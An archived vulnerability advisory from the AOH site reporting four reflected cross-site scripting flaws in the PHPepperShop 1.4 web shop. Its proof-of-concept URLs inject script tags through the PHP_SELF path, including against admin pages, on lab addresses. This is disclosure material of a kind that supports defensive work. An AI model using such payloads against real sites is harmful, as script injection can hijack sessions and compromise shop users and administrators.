AOH :: HP Unsorted X :: VA2006.HTM

PHPepperShop v 1.4 XSS



XSS in PHPepperShop v 1.4
XSS in PHPepperShop v 1.4



Vulnerable Version:PHPepperShop v 1.4=0D
Homepage:http://www.phpeppershop.com=0D 
=0D
This is 4 reflective XSS flaws in the URI. Trust no one not even your $_SERVER[PHP_SELF]=0D
=0D
http://10.1.1.10/shop/kontakt.php/'=0D 
=0D
http://10.1.1.10/index.php/%22%3Cscript%3Ealert(1)%3C/script%3E=0D 
=0D
http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22%3Cscript%3Ealert(1)%3C/script%3E=0D 
=0D
alert(1)http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/" 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.